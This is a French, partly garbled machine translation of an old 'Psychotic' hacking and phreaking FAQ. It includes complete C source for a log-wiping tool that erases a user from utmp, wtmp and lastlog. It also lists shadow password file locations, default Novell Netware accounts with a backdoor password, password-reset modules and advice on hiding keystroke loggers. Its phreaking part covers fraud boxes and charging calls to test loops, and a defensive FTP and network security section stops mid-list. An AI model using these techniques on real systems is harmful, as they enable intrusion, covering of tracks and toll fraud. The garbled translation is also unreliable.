Les Questions fréquemment posées sur le Hacking - Les FAQ de Psychotic




image
Frequently asked questions par Psychotic




Les Questions fréquemment posées



------------------------------------------------------------
Les FAQ de Psychotic
par Virtual Circuit et Psychotic
------------------------------------------------------------

I. HACKING


* Qu'est-ce que le hacking?
* Comment cracker les mots de passe sombres?
* Comment puis-je indiquer la différence entre un mot de passe crypté et un mot de passe sombre?
* Où puis-je trouver le fichier de mot de passe s'il est sombre?
* Où se trouve le fichier de mot de passe?
* Qu'est-ce qu'un exploit?
* Quelles sont les commandes basiques de Telnet?
* Comment puis-je sortir du fichier journal?
* Qu'est-ce qu'un DNIC?
* Qu'est-ce qu'un NUA?
* Qu'est-ce qu'un VAX / VMS?
* Qu'est ce que Telnet?
* Qu'est-ce qu'un remailer anonyme?
* Qu'est-ce que PGP?
* Qu'est-ce qu'un TCP/IP?
* Qu'est-ce qu'un virus?
* Qu'est-ce qu'un cheval de Troie?
* Qu'est-ce qu'un ver?
* De quoi ai-je besoin pour devenir un Hacker?
* Quels sont les comptes courants de Novell Netware?
* Comment puis-je obtenir l'accès du superviseur à Novell Netware?
* Comment puis-je accéder aux mots de passe de Novell?
* Comment puis-je créer un mot de passe Novell Netware?
* Quels sont les codes (TLD) de domaine?

II. PHREAKING


* Qu'est-ce que phreaking?
* Comment démarrer phreaking?
* Qu'est-ce que les boîtes?
* Quel genre de boîtes y a-t-il?
* Comment puis-je créer une boîte?
* Qu'est-ce qu'une boucle?

III. Sécurité


* Comment configurer un serveur FTP anonyme?
* Quelles sont les façons dont je peux sécuriser un réseau?
* Qu'est-ce qu'un «livre arc-en-ciel»?
* Qu'est-ce qu'un renifleur?
* Qu'est-ce qu'un pare-feu?
* Comment puis-je profiter de PGP?

IV. Questions de groupe


* Qu'est-ce que Psychotic?
* Psychotic recherche de nouveaux membres?
* Qu'est-ce que la psychose?
* Qu'est-ce que la "Porte du diable"? "Devil's Gateway?"
* Où puis-je trouver de bonnes ressources sur le Hacking et le Phreaking?
* Qui sont tous les membres de Psychotic?
* Quels sont les services offerts par Psychotic?



Q. Qu'est-ce que le Hacking?

R. Hacking est l'art de transformer en informatique pour acquérir des connaissances que notre société nous a cachées. Le Hacking est en partie illégal et le gouvernement dépense beaucoup d'argent chaque année pour que les Hackers (Black Hat) soient arrêtés ... quand ils devraient dépenser de l'argent sur des questions plus importantes.

Q. Qu'est-ce qu'un mot de passe sombre?

R. Un mot de passe sombre (shadowed password) est une couverture pour le fichier de mot de passe réel. Il montre que le mot de passe réel est caché ailleurs.

Q. Comment puis-je craquer les mots de passe sombres?

R. Cracker un fichier de mot de passe sombre est impossible. En supposant que vous avez obtenu le fichier de mot de passe via ftp anonyme, Vous devriez essayer de vous connecter au port 25 et faire le bug sendmail.

Q. Quelle est la différence entre un mot de passe crypté et un mot de passe sombre?

R. Un mot de passe crypté est simplement le mot de passe réel brouillé et modifié. Il peut être craqué avec un mot de passe craqué et un dictionnaire de mots de passe. Un mot de passe sombre masque le mot de passe chiffré quelque part autre que le répertoire etc.

Q. Où puis-je trouver le fichier de mot de passe s'il est sombre?

R.
Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow

System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


Q. Où se trouve le fichier de mot de passe?

R. Le fichier de mot de passe se trouve dans le répertoire /etc/passwd Vous pouvez accéder au répertoire etc en vous connectant au domaine via ftp anonyme.

Q. Qu'est-ce qu'un exploit?

R. Un exploit est quelque chose qui exploite unix ou un autre type d'OS. Vous utilisez habituellement des exploits pour acquérir une racine ou un accès élevé à un système. Ils peuvent s'avérer très utiles.

Q. Quelles sont les commandes basiques de Telnet?

R. Ci-dessous une liste des commandes communes de Telnet.

Commande Function

access Telnet account //Compte Telnet
c Connect to a host //Se connecter à un hôte
cont Continue //Continuer
d Disconnect //Deconnecter
full Network echo //écho du réseau
half Terminal echo //écho du terminal
hangup Hangs up //racrocher
mail Mail
set Select PAD parameters //Sélectionner paramètes PAD
stat Show network port. //afficher le port réseau
telemail Mail

Q. Comment puis-je me retirer du fichier journal?

R. Modifier /etc/utmp, /usr/adm/wtmp et /usr/adm/lastlog. Ce ne sont pas des fichiers texte pouvant être édités à la main avec vi, vous devez utiliser un programme spécifiquement écrit à cet effet.
Exemple:


#include //header
#include //header
#include //header
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}


Q. Qu'est ce que DNIC?

R. Un DNIS indique quel réseau se connecte au telnet que vous utilisez.

Q. Qu'est-ce que NUA?

R. Le NUA est l'adresse de l'ordinateur sur telnet.

Q. Qu'est-ce qu'un VAX/VMS?

R. Un VAX/VMS est la ligne informatique principale de Digital Equipment. Son système d'exploitation exclusif est connu sous le nom VMS.

Q. Qu'est ce que telnet?

R. Telnet est un programme qui vous permet de vous connecter à d'autres ordinateurs sur le net.

Q. Qu'est-ce qu'un remailer anonyme?

R. Un remailer anonyme est un système sur Internet qui vous permet d'envoyer par courrier électronique de manière anonyme ou de publier des messages à Usenet de manière anonyme. Vous lancez une demande d'identifiant anonyme sur le site Remailer. Ensuite, lorsque vous envoyez un message au remailer, il l'envoie de votre identifiant anonyme au remailer. Personne, lisant la publication, ne connaîtra le nom de votre compte réel ou votre nom d'hôte. Si quelqu'un envoie un message à votre identifiant anonyme, il sera transmis à votre compte réel par le remailer.

Q. Qu'est-ce que PGP?

R. Cette réponse aux FAQ est extraite de:
Guide de l'utilisateur PGP (TM) Volume I: Thèmes essentiels de Philip Zimmermann
PGP (TM) utilise le cryptage à clé publique pour protéger les courriels et les fichiers de données. Communiquez en toute sécurité avec des personnes que vous n'avez jamais rencontrées, sans aucun canal sécurisé nécessaire pour l'échange préalable de clés. PGP est bien présenté et rapide, avec une gestion sophistiquée des clés, des signatures numériques, la compression des données et une bonne ergonomie.
Pretty Good (TM) Privacy (PGP), de Phil's Pretty Good Software, est une application de logiciel cryptographique de haute sécurité pour MS-DOS, Unix, VAX/VMS et d'autres ordinateurs. PGP permet aux personnes d'échanger des fichiers ou des messages avec la confidentialité, l'authentification et la commodité. La confidentialité signifie que seuls ceux destinés à recevoir un message peuvent le lire. L'authentification signifie que les messages qui semblent être d'une personne donnée ne peuvent être originaires de cette personne. La commodité signifie que la confidentialité et l'authentification sont fournies sans les tracas de la gestion des clés associées aux logiciels cryptographiques classiques. Aucun canal sécurisé n'est nécessaire pour échanger des clés entre les utilisateurs, ce qui rend la PGP beaucoup plus facile à utiliser. C'est parce que PGP est basée sur une nouvelle technologie puissante appelée "clé publique" de cryptographie. PGP combine la commodité du cryptosystème de clé publique Rivest-Shamir-Adleman (RSA) avec la vitesse de la cryptographie conventionnelle, les signatures de messages pour les signatures numériques, la compression des données avant le cryptage, un bon design ergonomique et une gestion sophistiquée des clés. Et PGP exécute les fonctions de clé publique plus rapidement que la plupart des autres implémentations de logiciels. PGP est une cryptographie à clé publique pour les masses.

Q. Qu'est-ce que TCP/IP?

R. TCP/IP est utilisé par les réseaux systèmes pour communiquer les uns avec les autres. Il signifie Transmission Control Protocol (Protocole de Contrôle de Transmission) / Internet Protocol (Protocole Internet).

Q. Qu'est-ce qu'un virus?

R. Un Virus est un programme qui se reproduit. Il peut s'attacher à d'autres programmes, il peut créer des copies de lui-même. Il peut endommager ou corrompre les données, modifier les données ou dégrader les performances de votre système en utilisant des ressources telles que la mémoire ou l'espace disque. Certains scanners de virus détectent certains virus. Aucun scanneur de virus ne détecte tous les virus. Les scanners de virus fonctionneront pendant un certain temps, mais les gens créent toujours des virus qui les battront.

Q. Qu'est-ce qu'un cheval de Troie?

R. Un Trojan est un programme qui fait une fonction non autorisée, caché dans un programme autorisé. Il fait autre chose que ce qu'il prétend faire, habituellement quelque chose de malveillant, et l'auteur a l'intention de faire tout ce qu'il fait. Si ce n'est pas intentionnel, il s'appelle un bug.

Q. Qu'est-ce qu'un ver?

R. Les vers sont des programmes qui se copient eux-mêmes de plus en plus utilisant de l'espace et ralentissant le système. Ils sont autonomes et utilisent les réseaux pour se diffuser, de la même manière que les virus utilisent des fichiers pour se diffuser. Certaines personnes disent que la solution aux virus et aux vers est simplement de ne pas avoir de fichiers ou de réseaux.


Q. De quoi ai-je besoin pour devenir un Hacker?

R. Vous devriez commencer avec un bon scanner, certains accès partagés, un client telnet et une connaissance du Hacking. Ce sont les éléments de base dont vous aurez besoin. Si vous êtes sérieux au sujet du Hacking, vous devriez obtenir Unix, ou Linux (plus petite, version gratuite d'Unix).

Q. Quels sont les comptes courants de Novell Netware?

R. Vous trouverez ci-dessous une liste de comptes couramment utilisés pour Novell Netware.

compte But
---------- ------------------------------------------------------
PRINT Connexion à un deuxième serveur pour l'impression
LASER Connexion à un deuxième serveur pour l'impression
HPLASER Connexion à un deuxième serveur pour l'impression
PRINTER Connexion à un deuxième serveur pour l'impression
LASERWRITER Connexion à un deuxième serveur pour l'impression
POST Attacher à un deuxième serveur pour le courrier électronique
MAIL Joindre un deuxième serveur pour un courrier électronique
GATEWAY Fixation d'une machine de passerelle au serveur
GATE Attacher une machine de passerelle au serveur
ROUTER Attacher un routeur de messagerie au serveur
BACKUP Peut avoir des restrictions de mot de passe / station (voir ci-dessous), utilisé
pour sauvegarder le serveur sur une unité de bande attachée à un
poste de travail. Pour les sauvegardes complètes, l'équivalence du superviseur
est requis.
WANGTEK Voir BACKUP
FAX Fixation d'une unité de fax dédiée au réseau
FAXUSER Fixation d'une unité de fax dédiée au réseau
FAXWORKS Fixation d'une unité de fax dédiée au réseau
TEST Un compte d'utilisateur de test pour une utilisation temporaire
ARCHIVIST Palidrome compte par défaut pour la sauvegarde
CHEY_ARCHSVR Un compte pour Arcserve de se connecter au serveur
à partir de la console pour la sauvegarde sur bande. Version 5.01g's
Le mot de passe était WONDERLAND. Supprimer la station
Restrictions et utilisez SUPER.EXE pour basculer ceci
compte et vous avez une excellente porte dérobée.
WINDOWS_PASSTHRU Bien que non requis, par Microsoft Win95
Resource Kit, Ch. 9 p. 292 et Ch. 11 p. 401 vous
besoin de cela pour le partage des ressources sans mot de passe.

Q. Comment puis-je accéder à Novell Netware?

R. Tiré des FAQ de Novell NetWare.
La méthode secrète est la méthode d'utilisation d'un éditeur de secteur basé sur DOS pour éditer l'entrée dans le FAT et réinitialiser le bindery par défaut lors du redémarrage du serveur. Cela vous donne accès Superviseur et invité sans mot de passe. La méthode a été enseignée au cas où vous perdiez l'accès Supervisor sur un serveur Netware 2.15 et vous n'aviez aucun compte équivalent de supe créé. Il enregistre également le serveur à partir d'un effacement et redémarrez au cas où le compte Supervisor est corrompu, supprimé ou détruit.


Q. Comment puis-je accéder au fichier de mot de passe pour Novell?

R. L'accès au fichier de mot de passe dans Netware n'est pas comme Unix: le fichier de mot de passe n'est pas ouvert. Tous les objets et leurs propriétés sont conservés dans les fichiers bindery sur 2.x et 3.x et conservés dans la base de données NDS 4.x. Un exemple d'objet peut être une imprimante, un groupe, un compte individuel, etc. Un exemple de propriétés d'un objet peut inclure le mot de passe d'un compte ou le nom d'utilisateur complet, la liste des membres d'un groupe ou le nom complet. Les attributs des fichiers bindery (ou les drapeaux) dans 2.x et 3.x sont cachés et systèmes, et ces fichiers sont situés sur le volume SYS: dans le sous-répertoire SYSTEM. Leurs noms sont les suivants:

Netware version Nom des fichiers
-----------------------------------------------------------------------
2.x NET$BIND.SYS, NET$BVAL.SYS
3.x NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

NET$BVAL.SYS et NET$VAL.SYS sont l'endroit où les mots de passe sont réellement situés
en 2.x et 3.x respectivement.

Q. Comment puis-je créer un mot de passe Novell?

R. Tiré de la FAQ Novell Netware Hack.

Si la détection d'intrusion est désactivée, vous pouvez utiliser un cracker de mot de passe «brute force».
Les mots de passe cryptés sont la manière de Novell de protéger les mots de passe des sniffers.
Étant donné que les anciennes versions de Netware (2.15c) ont envoyé des mots de passe comme un texte clair, un renifleur pourrait voir le mot de passe au fur et à mesure. Pour sécuriser les choses, Novell a donné à l'administrateur un moyen de contrôler cela. Les versions ultérieures du programme LOGIN.EXE crypte le mot de passe avant de le transmettre à travers le fil au serveur. Mais avant que cela ne se produise, le shell (NETX) devrait être mis à jour. Comme certains endroits devaient avoir des shells plus anciennes et des anciennes versions de LOGIN.EXE pour prendre en charge les équipements anciens, l'administrateur a l'option d'autoriser les mots de passe non cryptés d'accéder au serveur. C'est fait en tapant SET ALLOW UNENCRYPTED PASSWORDS = ON sur la console ou en l'ajoutant à l'AUTOEXEC.NCF. La valeur par défaut est OFF, ce qui signifie que NOVELBFH pourrait être sonore à chaque tentative de la console du serveur! Heureusement, la plupart des sites mettent ce commutateur sur prendre en charge un ancien périphérique.

Si vous avez accès à la console, soit en vous tenant devant ou par RCONSOLE, vous pouvez utiliser SETSPASS.NLM, SETSPWD.NLM ou SETPWD.NLM pour réinitialiser les mots de passe.
Il suffit de charger le NLM et de passer les paramètres de la ligne de commande:

NLM Réinitialise le(s) compte(s) Version(s) de Netware
------------ ----------------- ----------------------------
SETSPASS.NLM SUPERVISOR 3.x
SETSPWD.NLM SUPERVISOR 3.x, 4.x
SETPWD.NLM any valid account 3.x, 4.x

Si vous pouvez planter un capteur de mot de passe ou un lecteur de frappe, vous pouvez les obtenir par ici. Le fichier LOGIN.EXE se trouve dans le répertoire SYS: LOGIN et normalement, vous n'aurez pas accès à un fichier dans ce répertoire. Le meilleur lieu pour mettre un programme de capture de frappe est sur le chemin de travail, avec l'ATTRIB reglé sur caché. L'avantage est que vous recevrez le mot de passe et Netware ne saura pas que vous l'avez glissé. L'inconvénient est d'avoir accès à la machine pour faire cela. Le meilleur endroit pour mettre l'un de ces programmes de capture est sur une machine commune, comme une boîte pcAnywhere, utilisée pour l'accès à distance. De nombreux emplacements permettront à pcAnywhere d'accéder à une machine pratiquement non logiciel sur celui-ci et contrôler l'accès de sécurité au LAN en utilisant les fonctions de sécurité de Netware. Téléchargement d'un programme de capture de frappe à une machine comme cela est ainsi defait.


Q. Quels sont les codes de domaine?

R. Ci-dessous la liste actuelle des codes de domaine.
AD Andorre
AE Émirats arabes unis
AF Afghanistan
AG Antigua-et-Barbuda
AI Anguilla
AL Albanie
AM Armenia
AN Antilles néerlandaises
AO Angola
AQ Antarctica
AR Argentine
AS Samoa américaines
AT Autriche
AU Australie
AW Aruba
AZ Azerbaidjan
BA Bosnie-Herzégovine
BB Barbados
BD Bangladesh
BE Belgique
BF Burkina Faso
BG Bulgarie
BH Bahreïn
BI Burundi
BJ Bénin
BM Bermudes
BN Brunei Darussalam
BO Bolivie
BR Brésil
BS Bahamas
BT Buthan
BV Bouvet Island
BW Botswana
PAR Belarus
BZ Belize
CA Canada
CC Îles Cocos (Keeling)
CF République centrafricaine
CG Congo
CH Suisse
CI Côte d'Ivoire
CK Îles Cook
CL Chili
CM Cameroun
CN Chine
CO Colombie
CR Costa Rica
CS Tchécoslovaquie
CU Cuba
CV Cap Vert
CX Christmas Island
CY Chypre
CZ République Tchèque
DE Allemagne
DJ Djibouti
DK Danemark
DM Dominique
DO République dominicaine
DZ Algérie
EC Equateur
EE Estonie
EG Égypte
EH Sahara occidental
ES Espagne
ET Ethiopie
FI Finlande
FJ Fidji
FK Falkland Islands (Malvinas)
FM Micronésie
FO Îles Féroé
FR France
FX France (territoire européen)
GA Gabon
GB Grande-Bretagne (Royaume-Uni)
GD Grenade
GE Géorgie
GH Ghana
GI Gibraltar
GL Groenland
GP Guadeloupe (français)
GQ Guinée équatoriale
GF Guyana (français)
GM Gambie
GN Guinée
GR Grèce
GT Guatemala
GU Guam (US)
GW Guinée Bissau
GY Guyana
HK Hong Kong
HM Heard et McDonald Islands
HN Honduras
HR Croatie
HT Haïti
HU Hongrie
ID Indonésie
IE Irlande
IL Israël
En Inde
IO Territoire britannique de l'océan Indien
IQ Iraq
IR Iran
IS Islande
IT Italie
JM Jamaïque
JO Jordan
JP Japan
KE Kenya
KG Kirgistan
KH Cambodge
KI Kiribati
KM Comores
KN Saint Kitts Nevis Anguilla
KP Corée du Nord
KR Corée du Sud
KW Koweït
KY Îles Caïmans
KZ Kazachstan
LA Laos
LB Liban
LC Sainte-Lucie
LI Liechtenstein
LK Sri Lanka
LR Liberia
LS Lesotho
LT Lituanie
LU Luxembourg
LV Lettonie
LY Libye
MA Maroc
MC Monaco
MD Moldavia
MG Madagascar
MH Îles Marshall
ML Mali
MM Myanmar
MN Mongolie
MO Macau
MP Îles Mariannes du Nord
MQ Martinique (français)
MR Mauritanie
MS Montserrat
MT Malte
MU Mauritius
MV Maldives
MW Malawi
MX Mexique
MY Malaysia
MZ Mozambique
NA Namibie
NC Nouvelle-Calédonie (Français)
NE Niger
NF Norfolk Island
NG Nigéria
NI Nicaragua
NL Pays-Bas
NO Norvège
NP Népal
NR Nauru
Zone neutre de NT
NU Niue
NZ Nouvelle-Zélande
OM Oman
PA Panama
PE Pérou
PF Polynesia (français)
PG Papouasie Nouvelle
PH Philippines
PK Pakistan
PL Pologne
PM Saint Pierre et Miquelon
PN Pitcairn
PT Portugal
PR Puerto Rico (États-Unis)
PW Palau
PY Paraguay
QA Qatar
RE Reunion (français)
RO Roumanie
RU Russian Federation
RW Rwanda
SA Arabie Saoudite
SB Îles Salomon
SC Seychelles
SD Soudan
SE Suède
SG Singapour
SH Sainte-Hélène
SI Slovénie
SJ Svalbard et Jan Mayen Islands
SK République slovaque
SL Sierra Leone
SM San Marino
SN Sénégal
SO Somalie
SR Suriname
ST Saint-Tomé-et-Principe
SU Union Soviétique
SV El Salvador
SY Syrie
SZ Swaziland
TC Îles Turques et Caïques
TD Chad
TF Territoire du Sud français
TG Togo
TH Thaïlande
TJ Tadjikistan
TK Tokelau
TM Turkmenistan
TN Tunisie
AU Tonga
TP Timor oriental
TR Turquie
TT Trinité-et-Tobago
TV Tuvalu
TW Taiwan
TZ Tanzanie
UA Ukraine
UG Ouganda
Royaume-Uni Royaume-Uni
Îles mineures éloignées des États-Unis
États-Unis États-Unis
UY Uruguay
UZ Ouzbékistan
VA Etat de la Cité du Vatican
VC Saint-Vincent-et-Grenadines
VE Venezuela
VG Îles Vierges Britanniques
VI Îles Vierges (États-Unis)
VN Vietnam
VU Vanuatu
WF Wallis et Futuna Islands
WS Samoa
YE Yémen
YU Yougoslavie
ZA Afrique du Sud
ZM Zambie
ZR Zaïre
ZW Zimbabwe
ARPA Ancien Arpanet
COM Commercial des États-Unis
EDU US Educational
GOV US Government
INT International
MIL US Military Champ
OTAN de l'OTAN
NET Réseau
ORG à but non lucratif



Q. Qu'est-ce que le phreaking?

R. Phreaking est quelque chose d'illégal qui concerne les téléphones et les lignes téléphoniques.

Q. Comment puis-je commencer le phreaking?

R. Vous devriez commencer par apprendre des boîtes et lire sur différents types de phreaking.

Q. Quelles sont les boîtes?

R. Ci-dessous est une liste des boîtes les plus communes et de ce qu'elles font.

Acrylic Box: voler appel-tri direction et appeler en attente.
Aero Box - Effectuez des appels gratuits depuis Payfones.
Aqua Box - Drain de la tension à partir d'un verrou FBI En trace call.
Beige Box - Réplique une ligne de jeux pour hommes.
Black Box - Permet à la partie appelante de ne pas être chargée pour l'appel qu'elle a placé.
Blast Box - Amplificateur Fone Microphone.
Blotto Box - Shorts tous les jours dans la région.
Blue Box - Utilisant des tonalités 2600Hz pour les appels Fone gratuits.
Brown Box - Crée une ligne de fête de 2 lignes Fone existantes.
Bud Box - Utilisé pour exploiter la ligne fone de votre voisin.
Busy Box - Utilisé pour tuer la tonalité de la tonalité de quelqu'un.
Chartreuse Box - Utilisez l'électricité de votre téléphone pour d'autres choses.
Cheese Box - Transforme votre téléphone en Payfone.
Chrome Box - Permet de manipuler les feux de circulation par télécommande.
Clear Box - Utilisé pour faire des appels gratuits sur Fortress Fones.
Copper Box - Provoque une interférence interprofessionnelle sur une extension.
Crimson Box - Actes comme un bouton 'Hold' pour votre fone.
Dark Box - Récupère les appels sortants ou incompatibles vers une autre source.
Dayglo Box - Permet de vous connecter à la ligne fone de votre voisin.
Ditto Box - Vous permet d'évoluer sur une autre ligne.
Divertor Box - Récupère les appels sortants ou incompatibles vers un autre fone.
DLOC Box - Permet de confiser 2 lignes (autres que la vôtre).
Gold Box - Permet de tracer un appel ou de lui indiquer s'il a été tracé.
Green Box - Permet de créer le Coin Collect, Coin Return et Ringback Tones.
Jack Box - Un clavier tactile.
Light Box - Un émetteur AM.
Lunch Box - Utilisé pour exploiter la ligne fone de votre voisin.
Magenta Box - Connecte une ligne fone distante à une autre ligne fone distante.
Mauve Box - Permet de faire un robinet sans couper dans la bonne ligne.
Neon Box - Un microphone externe.
New Gold Box - Une nouvelle version mise à jour de Gold Box.
Noise Box - Crée un bruit de ligne.
Olive Box - Utilisé comme sonnerie externe.
Paisley Box - Une combinaison de presque toutes les cases.
Pandora Box - Crée une tonalité de haute intensité qui peut causer de la douleur. C'est bon pour se faire plaisir.
Party Box - Permet de faire une ligne de fête à partir de 2 lignes Fone.
Pearl Box - Un générateur de sons.
Pink Box: vous permet d'accrocher deux lignes séparées et d'appeler 3 voies.
Purple Box - Un bouton de maintien.
Rainbow Box - Tue une trace en mettant 120v dans la ligne Fone.
BoRed x - Permet de faire des appels gratuits à partir d'un payfone en produisant les tonalités des pièces de monnaie.
Rock Box - Ajoute de la musique à votre ligne Fone.
Scarlet Box - Silver Box - Ajoute des tonalités de priorité DTMF A, B, C et D à votre ligne.
Slush Box - Peut être installé sur des lieux d'affaires dotés de fone multi-lignes standard.
Static Box - Conservez la tension sur une ligne haute.
Switch Box - Ajoute la prise, les voyants lumineux, la lumière, etc.
Tan Box - Enregistreur de ligne activé par téléphone.
Tron Box - Inverser la phase d'alimentation de votre maison et faire fonctionner votre compteur plus lentement.
Urine Box - Effectue une perturbation entre les fils de l'anneau et du bout dans certains pays.
Violet Box - Permet à un payfone de raccrocher.
White Box - Un clavier portable DTMF.
Yellow Box - Ajoutez une extension.


Q. Comment puis-je créer une boîte?

R. Chaque boîte a un plan de vaisselle pour la mettre en place. Il suffit de faire une recherche de réseau pour phreaking ou des boîtes et vous pouvez trouver tous les plans dont vous avez besoin.

Q. Qu'est-ce qu'une boucle?

R. Cette réponse aux FAQ est extraite de:
ToneLoc v0.99 Manuel d'utilisation de Minor Threat & Mucho Maas
Les boucles sont une paire de numéros de téléphone, généralement consécutifs, comme 836-9998 et 836-9999. Elles sont
utilisé par la compagnie de téléphone pour les tests. Quelles bonnes boucles nous font-elles? Eh bien, ils sont cool en quelques façons. Voici une utilisation simple des boucles. Chaque boucle a deux extrémités, une extrémité «haute» et une extrémité «basse». Une extrémité donne une tonalité (habituellement) constante et bruyante quand on l'appelle. L'autre extrémité est silencieuse. Les boucles ne s'entendent pas non plus généralement. Lorsque les deux extrémités sont appelées, les personnes qui ont appelé chaque extrémité peuvent parler à travers la boucle.
Certaines boucles sont filtrées par la voix et ne passent qu'une tonalité constante; Ce n'est pas très utile pour vous. Voici ce que vous pouvez utiliser des boucles pour faire: facturer des appels téléphoniques! Tout d'abord, appellez la fin qui donne le ton fort. Ensuite, si l'opérateur ou quelqu'un appelle l'autre extrémité, la tonalité s'éteindra. Agissez comme si le téléphone venait d'appeler et vous l'avez répondu ... dis-lui "Bonjour", "Allo", "Chow", "Yo" ou quelle bêtise. L'opérateur pense qu'elle vient de vous appeler, et c'est tout! Maintenant, la facture du téléphone ira à la boucle, et votre RBOC local recevra la facture! Utilisez cette technique avec modération, ou la boucle peut diminuer. Les boucles sont probablement les plus utiles lorsque vous souhaitez parler à quelqu'un à qui vous ne souhaitez pas donner votre numéro de téléphone.

Q. Comment configurer un FTP anonyme?

R. Tiré du texte de Internet Security Systems, Inc. sur la configuration d'un ftp anonyme.
- 1.Construisez une version statiquement liée de ftpd et mettez-la dans ~ftp/bin. Assurez-vous qu'il appartient à la racine.
- 2. Créez une version statiquement liée de /bin/ls si vous en avez besoin. Mettez-le dans ~ftp/bin. Si vous êtes sur un Sun, et que vous devez en créer un, il existe une version portée de la commande BSD net2 ls pour SunOs
sur ftp.tis.com: pub/firewalls/toolkit/patches/ls.tar.Z Assurez-vous qu'il appartient à la racine.
- 3.Chown ~ftp à la racine et le rendre mode 755 CELUI-CI EST TRÈS IMPORTANT
- 4.Configurez les copies de ~ftp/etc/passwd et ~ftp/etc/group tout comme vous le feriez normalement, SAUF
Créez le répertoire personnel 'ftp' / '- assurez-vous qu'ils sont propriétaires de root.
- 5. Effectuez une enveloppe pour redistribuer ftpd et installez-la dans /etc/inetd.conf L'enveloppe devrait ressembler à quelque chose comme: (en supposant ~ftp = /var/ftp)


main()
{
if(chdir("/var/ftp")) {
perror("chdir /var/ftp");
exit(1);
}
if(chroot("/var/ftp")) {
perror("chroot /var/ftp");
exit(1);
}
/* optional: seteuid(FTPUID); */
execl("/bin/ftpd","ftpd","-l",(char *)0);
perror("exec /bin/ftpd");
exit(1);
}


Options:
     Vous pouvez utiliser 'netacl' à partir de la boîte à outils ou tcp_wrappers pour obtenir le même effet.
     Nous utilisons 'netacl' pour basculer afin que quelques machines qui se connectent au service FTP * ne * ne soient pas chrootées en premier. Cela rend le transfert de fichiers un peu moins pénible.
     Vous pouvez également prendre vos sources ftpd et trouver tous les endroits où il appelle seteuid () et les supprimer, puis faire en sorte que le wrapper effectue un setuid (ftp) juste avant l'exécution. Cela signifie que si quelqu'un connaît un trou qui les rend «root», ils ne le seront toujours pas. Détendez-vous et imaginez combien ils seront frustrés.
     Si vous piratez des sources ftpd, je vous suggère de désactiver un tas d'options dans ftpcmd.y en désinstallant le drapeau "mis en œuvre" dans ftpcmd.y. Ceci n'est pratique que si votre zone FTP est en lecture seule.
- 6. Comme d'habitude, faites passer la zone FTP et assurez-vous que les fichiers sont en mode correct et qu'il n'y a rien d'autre qui puisse être exécuté.
- 7. Notez, maintenant, que votre zone FTP /etc/passwd est totalement séparé de votre réel /etc/passwd.
     Cela présente des avantages et des inconvénients.
- 8. Certaines choses peuvent se briser, comme syslog, car il n'y a pas /dev/log. Créez une version de ftpd avec une routine syslog() UDP ou exécutez une deuxième syslogd basée sur le code BSD Net2, qui conserve un socket de domaine unix nommé ~ftp/dev/log avec l'indicateur -p.


Q. Quelles sont les façons dont je peux sécuriser un réseau?

R. Tiré du texte de Internet Security Systems sur la sécurisation d'un réseau.
1. Bien avant tout, vous devez savoir quel type de ressources vous essayez de protéger: CPU, fichiers, périphériques de stockage, etc.
2. Déterminer les mesures de sécurité spécifiques à l'hôte nécessaires. Protection par mot de passe, cryptage des fichiers, pare-feu, etc.
     Déterminez qui les systèmes informatiques doivent être défendus.
     Déterminer la probabilité d'une menace.
     Mettre en œuvre des mesures pour protéger les ressources réseau.

3. Considérez le budget de l'entreprise lors de la planification de la Sécurité Internet.

4. Concevez une politique de sécurité qui décrit les préoccupations de sécurité de votre organisation en matière de sécurité. Cette politique devrait prendre en compte ce qui suit:

     Planification de la sécurité du réseau
     Politique de sécurité du site
     Analyse de risque
     L'analyse des risques consiste à déterminer ce qui suit:
          Ce que vous devez protéger
          De quoi vous devez protéger
          Comment le protéger
          Estimation du risque de perte de la ressource
          Estimation de l'importance de la ressource

5. Considérons les facteurs suivants pour déterminer qui accordera l'accès aux services sur votre
réseaux:
     L'accès aux services sera-t-il accordé à partir d'un point central?
     Quelles méthodes utiliserez-vous pour créer des comptes et mettre fin à l'accès?

6. Concevoir et mettre en œuvre des règles de filtrage des paquets

7. Assurez-vous que votre pare-feu possède les propriétés suivantes:
